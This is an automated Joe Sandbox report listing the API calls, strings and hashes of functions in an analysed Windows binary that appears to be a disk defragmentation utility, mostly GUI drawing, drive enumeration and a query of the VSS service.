                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                    • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                    • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                    • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                    • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                    Function 00402140 Relevance: 35.3, APIs: 7, Strings: 13, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                    • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$8F$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                    • API String ID: 3599163918-1643340582
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                    • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                    Function 0041B4B0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 135serviceCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4C2
                                                                                                                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4DD
                                                                                                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4EA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                    • String ID: 0N$VSS
                                                                                                                                                                                                                                                                                    • API String ID: 4136619037-702027763
                                                                                                                                                                                                                                                                                    • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                    • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                    Function 004164C0 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 304windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                    • String ID: 4$8F$COMBOBOX
                                                                                                                                                                                                                                                                                    • API String ID: 3327461832-961196532
                                                                                                                                                                                                                                                                                    • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                    Function 00432180 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 303windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D2E0: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D2E0: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3242431549
                                                                                                                                                                                                                                                                                    • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                    Function 00421750 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 306windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,BB40E64E), ref: 004215AC
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401097$8F$ScheduleStart$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1016491994-1295084991
                                                                                                                                                                                                                                                                                    • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                    Function 0040AE80 Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 434COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040AEFA
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000048), ref: 0040AF5E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object
                                                                                                                                                                                                                                                                                    • String ID: CharSet$ClipPrecision$Escapement$Italic$Name$Orientation$OutPrecision$PitchAndFamily$Quality$Size$StrikeOut$Underline$Weight
                                                                                                                                                                                                                                                                                    • API String ID: 2936123098-848768055
                                                                                                                                                                                                                                                                                    • Opcode ID: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction ID: 678cc5ad66024a4e3a2d6689a74d43ebfb952ff3fe0b92c748617c9598e0b8bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E021371508740DFD360DF61C984B5BB7F9EB88304F108A2EF98A87291D778A944CFA6
                                                                                                                                                                                                                                                                                    Function 00401570 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 273windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                    • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                    • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                    • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                    • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                    • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                    • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                    • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                    • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                    • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                    • String ID: &$>=
                                                                                                                                                                                                                                                                                    • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                    • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                    Function 00453F10 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 201fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000328,?,00000000), ref: 00453F69
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453FDE
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454016
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328,00000000,00000000), ref: 00454026
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454057
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 00454066
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?), ref: 00454071
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540A7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
